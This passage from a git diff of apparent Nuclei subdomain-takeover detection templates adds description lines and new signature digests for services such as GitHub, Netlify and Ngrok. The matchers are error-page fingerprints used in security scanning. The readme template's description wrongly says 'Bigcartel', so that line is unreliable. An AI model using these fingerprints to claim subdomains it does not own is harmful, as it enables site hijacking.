index 620beea496..8646850340 100644
--- a/http/takeovers/flexbe-takeover.yaml
+++ b/http/takeovers/flexbe-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Flexbe Subdomain Takeover
   author: 0x_Akoko
   severity: high
+  description: Flexbe takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/237
     - https://help.flexbe.com/domains/
@@ -31,5 +32,4 @@ http:
       - type: status
         status:
           - 404
-
-# digest: 4a0a00473045022100a72bd26dfbb4c1644e42784b5cfb8875984fddac3c5828eed8e74313fafda6e802202a682745bf742847825be33c3725ed280be7b2f163c47d0df83b68c5da447158:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100815bad00e060131f9f67695b3e5746f6b5feb9ac156fc15500adb76f825f1c92022100a1e5408a0f54a721f143c3b7f44e004f98dbf784584a2c3d9fff0925a0c075ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/flywheel-takeover.yaml b/http/takeovers/flywheel-takeover.yaml
index 2d5afba3b9..de53cb511d 100644
--- a/http/takeovers/flywheel-takeover.yaml
+++ b/http/takeovers/flywheel-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Flywheel Subdomain Takeover
   author: smaranchand
   severity: high
+  description: Flywheel takeover was detected.
   reference:
     - https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover
   metadata:
@@ -30,5 +31,4 @@ http:
         part: body
         words:
           - "We are sorry, you've landed on a page that is hosted by Flywheel"
-
-# digest: 490a004630440220222d7f505d31d0ae9cd4ed2f2077a871019339422cdfe96fd1abd0e0794688ac022067967e782a5d5bea7d27e3e1603b7c19ecdb077e019c95c6061099b504cf74cf:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c65c64d3a7226e36ae3cf134895cc98fb03a04cdfc9dc431eeb61696a096dd380220464ee36598416ac00838699b717d73b587432b2ed738fe71b2b5da09cc272ab6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml
index 2d394691ef..da94fb03c2 100644
--- a/http/takeovers/frontify-takeover.yaml
+++ b/http/takeovers/frontify-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: frontify takeover detection
   author: pdteam
   severity: high
+  description: frontify takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/170
   metadata:
@@ -26,5 +27,4 @@ http:
           - 404 - Page Not Found
           - Oops… looks like you got lost
         condition: and
-
-# digest: 4a0a0047304502207b7980c1553915287f0a03202000945918e11e8842c6feb4ee4ef488b8d25dce022100aef3a8f789fc28a6b0e98a2f1a5b1c5ab0a270f21e5a32b6a1b32f9435f909a6:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022021b423105a656ced8ce8e422c0bddf2ed4b3f550ca7d7c9ac82743af2195e3f3022034a251441fb9da75665b9a0dce13a77c96aa2459116904b043670e79022a7ebd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml
index 475024f2f8..09d562e8ed 100644
--- a/http/takeovers/gemfury-takeover.yaml
+++ b/http/takeovers/gemfury-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Gemfury Takeover Detection
   author: pdteam,daffainfo
   severity: high
+  description: Gemfury takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/154
   metadata:
@@ -28,5 +29,4 @@ http:
         part: header
         words:
           - "Location: https://gemfury.com/404"
-
-# digest: 4a0a0047304502207d1e923e332bbd44484c70cca00b2b0e43db96ef321a58b72c409f37e80de8b60221008d41f154792f267876fa05a63d64a3317c9a07f22f701037dfbc73efa018b9cf:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e7d6dba0eda3d3930f3dca078b7ad077afffc4dd087816a8d927f4c53d8c7687022100d893083aed1f67decbf6e1e59e4e1244fccc936e2f881303f15d0f4fdef4f437:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml
index ec9fc575d8..63e527da6d 100644
--- a/http/takeovers/getresponse-takeover.yaml
+++ b/http/takeovers/getresponse-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Getresponse Takeover Detection
   author: pdteam
   severity: high
+  description: Getresponse takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - 'With GetResponse Landing Pages, lead generation has never been easier'
-
-# digest: 4a0a0047304502204cff17b20198cbb48bdc9ae3023965a5ba12d2b129bb954ce7124403da269703022100c216d012c4293f947b5651400178836b07b307c889d8de04b69c7fb355d51145:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220050020aa27e758170d84b6e73692424006b84848ca5faae8e6bffadccc5c2000022016771fdf888e33a79802255d3530b581f338b6933415a56c05a3feb2a3ee777c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml
index 7dc1ea6441..bb070d4fe7 100644
--- a/http/takeovers/ghost-takeover.yaml
+++ b/http/takeovers/ghost-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: ghost takeover detection
   author: pdteam
   severity: high
+  description: ghost takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89
   metadata:
@@ -29,5 +30,4 @@ http:
       - type: status
         status:
           - 302
-
-# digest: 4b0a00483046022100df69a30e0012a7d6f8c70fb746de5c1998235b0fa6b15b857101222d5785baf3022100b6def6323e08bff6264f91802a4be915c3c2c5281213d6e77ded5013c69a6089:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a5aa3c5ce4a8bc142b327031cd1fb21f5732356c4fb0ea207c8f9752f67f4c35022001ad7f03961d10bd1810747fc83882f4f22b7c6a6b080da3ecf474d6d9ceba2e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml
index 1501dc6126..1fdd67dfa2 100644
--- a/http/takeovers/gitbook-takeover.yaml
+++ b/http/takeovers/gitbook-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: gitbook takeover detection
   author: philippedelteil
   severity: high
+  description: gitbook takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/259
     - https://hackerone.com/reports/223625
@@ -27,5 +28,4 @@ http:
           - "If you need specifics, here's the error"
           - "Domain not found"
         condition: and
-
-# digest: 4a0a0047304502210093c822f99d160ec31ba2838b87867d7a86e8ce6c93909cf1f5b3d0d29ad55e7102200e20144da548d441f9e161effd7c5437cd20bd1ff64cccd714e9a17cc0aa1fe0:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022052ee60fe1e2ef8770b8e8cbce78d52f642c4db18a81c84a23cf711895b5893fa02204de56d859be0fc6514cfcf19609067c70683e9938c8b9c3b56a034d2d1a3d609:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml
index 29976f3991..fc4932c49c 100644
--- a/http/takeovers/github-takeover.yaml
+++ b/http/takeovers/github-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Github Takeover Detection
   author: pdteam,th3r4id
   severity: high
+  description: Github takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -33,5 +34,4 @@ http:
           - '!contains(host,"github.com")'
           - '!contains(host,"github.io")'
         condition: and
-
-# digest: 4b0a00483046022100c5bd64650c55bf81ed25e586e2fa2bcb49186e014e69d921d47926a690085637022100efc929ad2fc33550f9e56ee8fb03601fd3502657ed4cbe3e179f996c2180f9f4:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100bb060bc8d7e38ff45b518bb436e03abc7179df307c79f75d9adbac9db571fc280220235be437c7bb36a211f7394383c66307e07cb0360b717690d37dab1b2e547e74:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml
index a07334a1fd..e4b49b6a83 100644
--- a/http/takeovers/hatenablog-takeover.yaml
+++ b/http/takeovers/hatenablog-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Hatenablog Takeover Detection
   author: pdteam
   severity: high
+  description: Hatenablog takeover was detected.
   reference:
     - https://beaglesecurity.com/blog/vulnerability/hatenablog-takeover-detection.html
     - https://github.com/EdOverflow/can-i-take-over-xyz
@@ -25,5 +26,4 @@ http:
       - type: word
         words:
           - "404 Blog is not found"
-
-# digest: 490a0046304402207ae7c9b10b010c9160eda0b8907a8761f472f2240811a3963d041418c7c4e0be02200c1f5e855b7696d53d87de317fc2c125b660d5d9bd00b5c76f2fcd4ba64ef2c0:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100cccbda6f194b9c13e8d429fd19d5d99b9268c9ed3ac3886b5ca81a70bae502e5022100c63cbb05f231049af04acf8cdc226426618570036ed0b0b17b1ce7e576ab5acd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml
index 20654ed5f2..183ea980e0 100644
--- a/http/takeovers/helpjuice-takeover.yaml
+++ b/http/takeovers/helpjuice-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: helpjuice takeover detection
   author: pdteam
   severity: high
+  description: helpjuice takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - We could not find what you're looking for.
-
-# digest: 4b0a00483046022100c3b1e708e61d712c8a9616ad77c177cc7d98d277b7c0cfb32e55ea564160ae9e022100bd534c77da7a840ca3ee4eaad9859b0cf58ab2c9fcf3ad09182f2911210e016d:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f6cc8d12b3d37ce071d0f0991b48a2cde1418c6306fdaff878e637d95da5c809022100ea84154d67d1ef86b4ba76171d91b9f7869dc5d291e7aa44cb168dcb38fc0178:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml
index 4690a2dfc9..e11f8ad27a 100644
--- a/http/takeovers/helprace-takeover.yaml
+++ b/http/takeovers/helprace-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Helprace Takeover Detection
   author: pdteam
   severity: high
+  description: Helprace takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115
   metadata:
@@ -25,5 +26,4 @@ http:
         words:
           - "Alias not configured!"
           - "Admin of this Helprace account needs to set up domain alias"
-
-# digest: 4a0a0047304502210097b8b591d5cd5634ed5f8e5491a9f350c2937c02cc4692b9fff4ffc13f1abeac022075e1c71a9df887e6cd1080b1aa35bf30ea9aee9ad21f92ac55b72a8b5e265e8d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210087860d3c24c0e128ed5238827375c4ab06496c1780dee8ce4dd39a7906ca0ae00220710d80043d511d5517f1bc91d5d85a543306e03b08dcfc32c1fa85dd555fdf9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml
index 732aadc67b..15b1add48e 100644
--- a/http/takeovers/helpscout-takeover.yaml
+++ b/http/takeovers/helpscout-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: helpscout takeover detection
   author: pdteam
   severity: high
+  description: helpscout takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - "No settings were found for this company:"
-
-# digest: 4a0a00473045022100b23571f6d596bb39a22933f8b78aa3a1cde86978367a7ae078f19f728f46bd62022018a314ce0157fddcbed4e268d817cf1b8c15d92e9f5d175af2e7f5bd54427475:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f82db3b5d07dfbfb6f11abb9f0abc7a1991698b51abcdbe03bc6b13f41d7710b022017ff27474089ced18f311f6798e2ed903d149f3da6ccd0efd91bab91c6c4d21f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml
index f15e3c65c9..6ba3a1b9d8 100644
--- a/http/takeovers/hubspot-takeover.yaml
+++ b/http/takeovers/hubspot-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: hubspot takeover detection
   author: pdteam
   severity: high
+  description: hubspot takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/59
     - https://hackerone.com/reports/335330
@@ -27,5 +28,4 @@ http:
           - "Domain not found"
           - "does not exist in our system"
         condition: and
-
-# digest: 4b0a004830460221009d140a18c75415bf083fe79d98a8b0b8ec81f675867783fb8e02443facc73aa1022100c2ab7c06d86d6c1ec1952fe70160b28d77835b36664c7160458e8364a032025e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a15863236633756d1edb190b798d1e8a6f4d6f5babf13f4f5556048598473beb02201f67a22838abed7e84f98d3f1ea74c297833e39784aac4808c60baa6d7957b0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml
index 337a771dbf..d0f6554de9 100644
--- a/http/takeovers/intercom-takeover.yaml
+++ b/http/takeovers/intercom-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Intercom Takeover Detection
   author: pdteam
   severity: high
+  description: Intercom takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/69
   metadata:
@@ -26,5 +27,4 @@ http:
           - '<h1 class="headline">Uh oh. That page doesn\’t exist.</h1>'
           - 'This page is reserved for artistic dogs.'
         condition: and
-
-# digest: 4b0a00483046022100f12c6ca5696fa66cf34bbbee7629634f363adba0fdbcd0ebd88829c46adbf907022100d1e7cb89fbe5ce9e0ea10c06abb4accdf589153173c8ce503669a5df88597419:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009d1ef63eb341e158cc4d429a755e07147b7a1df890918864db4d508b28d5647d02202f93b47c9dfc0376a95d3eaf020e73ebfed0a3ca5dcaccc0012fe4e1265b5d14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml
index df4817c0ef..712b447add 100644
--- a/http/takeovers/jazzhr-takeover.yaml
+++ b/http/takeovers/jazzhr-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: jazzhr takeover detection
   author: pdteam
   severity: high
+  description: jazzhr takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - This account no longer active
-
-# digest: 4a0a00473045022100b91cf718f3a296d7a423eddebc686b745f832428c73de6de69a22571b878e6e30220258525c65cef98fb44cd12082ac9aa2ae8b0dca8d313fd457ac9ce829c0a23eb:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221008f8a526afe19043f972676b23a0ad16e3eb20d1fd15d567f85aa4c69af7490a40220174307601261325b2c937087854fdcaaf5e8f5ece73f6b1295e4e1cc83ae6777:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml
index b75f304065..f47d2425b1 100644
--- a/http/takeovers/jetbrains-takeover.yaml
+++ b/http/takeovers/jetbrains-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Jetbrains Takeover Detection
   author: pdteam
   severity: high
+  description: Jetbrains takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/pull/107
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - is not a registered InCloud YouTrack.
-
-# digest: 490a0046304402206866f86aceef06feb6eb53638c7d5b1754dd684c96186e495998da85fefadc610220328ddeaebbfd1a3859bab5b2a5c4b6608d0f3421cf9816ca054f4968c1f09b59:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210081c1d412bdc5f9e45cd525b55171816a1ebd0e7c9d36e938bb57b441fe76edde0221009edfcf6086e6d9917073aa89ae5973b6b44be71db9e20919edb8a67f8f135a54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml
index abdaf97e9c..01789b73f0 100644
--- a/http/takeovers/kinsta-takeover.yaml
+++ b/http/takeovers/kinsta-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: kinsta takeover detection
   author: pdteam
   severity: high
+  description: kinsta takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - No Site For Domain
-
-# digest: 4a0a00473045022100850800770b643d08a823b938b549291cf191f816a0db28191b0ca6719a56cea402204adc2a82fecfb93fc2c401a6b5baa396620835856530714bc6be0e070d41bcf8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206044400efee80464021a449f3f2b0c26398e6453922d5d91170853fe77e53392022100b72b2fe2baa52138448d8b0be94b1ee244c1d373065cad601ef8d2566b5f1de4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml
index c38ff527b4..f1f515d961 100644
--- a/http/takeovers/launchrock-takeover.yaml
+++ b/http/takeovers/launchrock-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Launchrock Takeover Detection
   author: pdteam
   severity: high
+  description: Launchrock takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/74
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us.
-
-# digest: 4a0a00473045022070c3225667f6b4dc4b95046b85559fef650a810f5aaddfed07437126e6597668022100987547e285f9e8ccb065b386d570b3a74526e4a58390defad4394c8325a7f7dd:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210090dbe87f01c8309c771d28afa1d230137e25756c084b12ab3c7122b2a7630261022100a85fe10454d6207a146bd59f225234643f5da44be48fd4495dca47a8646d9fc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml
index 4411d685a5..b433fd5ea1 100644
--- a/http/takeovers/leadpages-takeover.yaml
+++ b/http/takeovers/leadpages-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Leadpages takeover detection
   author: philippedelteil
   severity: high
+  description: Leadpages takeover was detected.
   reference:
     - https://www.youtube.com/watch?v=HRFplefT46U
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/166
@@ -29,5 +30,4 @@ http:
           - "The page you’re looking for may have been moved"
           - "Double-check that you have the right web address and give it another go!"
         condition: or
-
-# digest: 4a0a00473045022030ff6b3efedbd2c14822201e04cfebb6639085b24cf85649e4a09889feee1a4f0221009d3379de248b0e51794bf7e447f471fc5dc8c9596cb483353609a3ca1fa79ed5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200dd0c65ea9c1bde329bbbbc48da6968bd7a8764db818f4b0b2662aa5f90cbcad0221009333f1d86ecbe74e5a099b1f2851f72ce7a74d2733da0c9813bd1c2e502707a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml
index 9bf5e24642..f12085edbc 100644
--- a/http/takeovers/mashery-takeover.yaml
+++ b/http/takeovers/mashery-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: mashery takeover detection
   author: pdteam
   severity: high
+  description: mashery takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/14
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - Unrecognized domain <strong>
-
-# digest: 490a0046304402201bc3a61e9afd2e60460aab171e75be7cc3ec4b527104d7b92eb26764ccf4eec50220646d6d81a5afcca6d17eea7501c7535a588b7cd0aca10f5f56ff7488a72e1516:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220750d4b0e60b943b940f6294035333c6aab7d5991a49b76cd9781c5143141aa7a0220064abdac1cfa23c8e64075bb9c8eb3660c2ee351f051877cfdd4bd704c0c4d0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml
index 63464611d8..4a143eba5d 100644
--- a/http/takeovers/meteor-takeover.yaml
+++ b/http/takeovers/meteor-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Meteor subdomain takeover
   author: rivalsec
   severity: high
+  description: Meteor takeover was detected.
   reference:
     - https://rivalsec.github.io/blog/2022/12/02/meteor.html
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/321
@@ -20,5 +21,4 @@ http:
       - type: word
         words:
           - "404 Not Found: No applications registered for host '"
-
-# digest: 490a00463044022063506a54626858c090a7315400d1f14b26359c053ee26cbb45b0d0fc98e952bf02203f83abc4de3f64d42c309a7fd6e703ea3fb0f6e8ad324e18f66781be120863ba:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220106fbac97760646029437a8745d2c52c78542cf9bfe774465264cbd0c3bd272b02200d06849853bdb1d987dae68ca4f28585ee62c27c4e3edbd6d2639ef754f75af0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml
index d54010e9b6..bc176dbfcb 100644
--- a/http/takeovers/netlify-takeover.yaml
+++ b/http/takeovers/netlify-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: netlify takeover detection
   author: 0xPrial,pdteam
   severity: high
+  description: netlify takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/40
     - https://monish-basaniwal.medium.com/how-i-found-my-first-subdomain-takeover-vulnerability-b7d5c17b61fd
@@ -33,5 +34,4 @@ http:
         part: header
         words:
           - "Netlify"
-
-# digest: 4a0a0047304502210094e0fe35e30b12c1cf6db708fd8597ef52ba708528ecf1116b7f07e2249c01fe0220744af5e2e56256aa12a333a9791d7f72cc9f5bf40b35f32c7ffd346e280165bd:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009a5a121d786fe47e6abfdf7b52f451237d696d19fa9df212b83dab270e03509b0220481f0dfdf70ae43cf23a05b969ad56aedcbb2f3f202d208b5b911e54342eb00c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml
index 81867aa123..4fe1c13906 100644
--- a/http/takeovers/ngrok-takeover.yaml
+++ b/http/takeovers/ngrok-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Ngrok Takeover Detection
   author: pdteam
   severity: high
+  description: Ngrok takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92
   metadata:
@@ -25,5 +26,4 @@ http:
         words:
           - ngrok.io not found
           - Tunnel *.ngrok.io not found
-
-# digest: 4b0a004830460221008a88ef305143859c51956c0043e62ecb6675879b4d1e02de0988912525aa8847022100bbca1a8d7f33172a8cf50fbcfb1bcd40313cacf49372dfee20ff3fe272f583e4:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008cf6a9807fc46be1355a7147dccd0eb9da046a96308c2f7ec21d020634e17c7002210084a3569ad587a666c3f615fc707f8efaaec9c5ce7ad73bd0720b3da2b25e65ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml
index 53ffb83bcc..bf0e5ff9a0 100644
--- a/http/takeovers/pagewiz-takeover.yaml
+++ b/http/takeovers/pagewiz-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Pagewiz subdomain takeover
   author: brabbit10
   severity: high
+  description: Pagewiz takeover was detected.
   reference:
     - https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL
   metadata:
@@ -27,5 +28,4 @@ http:
           - 'Start Your New Landing Page Now!'
           - 'pagewiz'
         condition: and
-
-# digest: 4a0a004730450221008e0badd586eb6a8785670fbcd88890be4b7043e97293a1d149460723c3e13265022014d13f196fb6bbfa475d98a7c3eda668a6fdb318a98ca26654b3d94fdb2db5ca:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220438d742994d111e4fa56adb384f11133af7019c3faf6ca8c6d8a634a3e591260022100d7bf8ba3814fab3b200485663be1161f0d6a8ad33224bd486730ec0f7bfed45e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml
index d6908bf648..fa6bbcce8f 100644
--- a/http/takeovers/pantheon-takeover.yaml
+++ b/http/takeovers/pantheon-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Pantheon Takeover Detection
   author: pdteam
   severity: high
+  description: Pantheon takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/24
     - https://medium.com/bug-bounty/how-i-took-over-several-stanford-subdomains-also-let-me-explain-you-the-pain-to-report-it-d84b08704be8
@@ -29,5 +30,4 @@ http:
       - type: dsl
         dsl:
           - '!contains(host,"apigee.io")'
-
-# digest: 4a0a00473045022031b79d2c999678a8ad72638ecec6bc9b47dfd3769588fbf99ebed2f464a254de022100d6e183af8823a1f3f175555d4024cd6cd11e340dc881eb83c4de845c15ee15a6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100eb34ca91df59d23692e3ef0fa3a62e217b7320372b4e58dc7e1877ac65dae3b50220168496114bc754b3dfd3a66b6d92331f74517a0266fd3cf7853523445a18136e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml
index 27bb7d5a93..278cfa6c12 100644
--- a/http/takeovers/pingdom-takeover.yaml
+++ b/http/takeovers/pingdom-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Pingdom Takeover Detection
   author: pdteam
   severity: high
+  description: Pingdom takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144
   metadata:
@@ -25,5 +26,4 @@ http:
         words:
           - Public Report Not Activated
           - This public report page has not been activated by the user
-
-# digest: 490a0046304402204ab6fd93f2582faaaa202da04a9eed829fa1930e688f04908276b48e1133a68902205950a49fc685132f6783462755eb65eefc2fb67098f57c62dfa36dc75c07890c:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100afda4c99e426c70cabf279d2bd2ba47c066c1865232547806d4e7cc14228c927022100a8a67314e0aa40fd5666e734ef69b3fbd1288225afa7ed3911add364adc54600:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml
index e8fa0836a8..eb3554e0b0 100644
--- a/http/takeovers/proposify-takeover.yaml
+++ b/http/takeovers/proposify-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: proposify takeover detection
   author: pdteam
   severity: high
+  description: proposify takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - If you need immediate assistance, please contact <a href="mailto:support@proposify.biz
-
-# digest: 4a0a00473045022100c61f60128aae8c020cc51e54fc099dd17a683b159aeb8e247ee2d7a1e0bc553502206b40e262139d5a0afca67bd27fff895d9e4234b83dd207ce3ce1d497aa8db88f:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100dcd0362df06ad3d224b52f3905afa42f8d0fd9325b3815b7068d7345f25c37ba022100e0cc8b3fc0073e42516de82fd4eb79b4735ef72a3c9635843cd7e983c559b0ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/readme-takeover.yaml b/http/takeovers/readme-takeover.yaml
index da91ead8ab..42d644c2fa 100644
--- a/http/takeovers/readme-takeover.yaml
+++ b/http/takeovers/readme-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Readme Takeover Detection
   author: pdteam
   severity: high
+  description: Bigcartel takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/41
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - 'Project doesnt exist... yet!'
-
-# digest: 4b0a004830460221008421f333ab778db10d34da3659ebf300c14bb3f50d8da69764bcc7f72a31c70302210087992bed8098c6e281e138f26c4747ec09724abf33040aa5907fcfc63cbe00a5:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402203ce68c217b0e6bacdf5a508d8da466b49e5d73ad05ff8c01c9c3f609676e034702201c851703ea8342c565836b59044d3b05d0bd0ca5b6e1e788e8ed173d260e82d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/readthedocs-takeover.yaml b/http/takeovers/readthedocs-takeover.yaml
index 6a9203c53e..12ffcc9353 100644
--- a/http/takeovers/readthedocs-takeover.yaml
+++ b/http/takeovers/readthedocs-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Read the Docs Takeover Detection
   author: pdteam
   severity: high
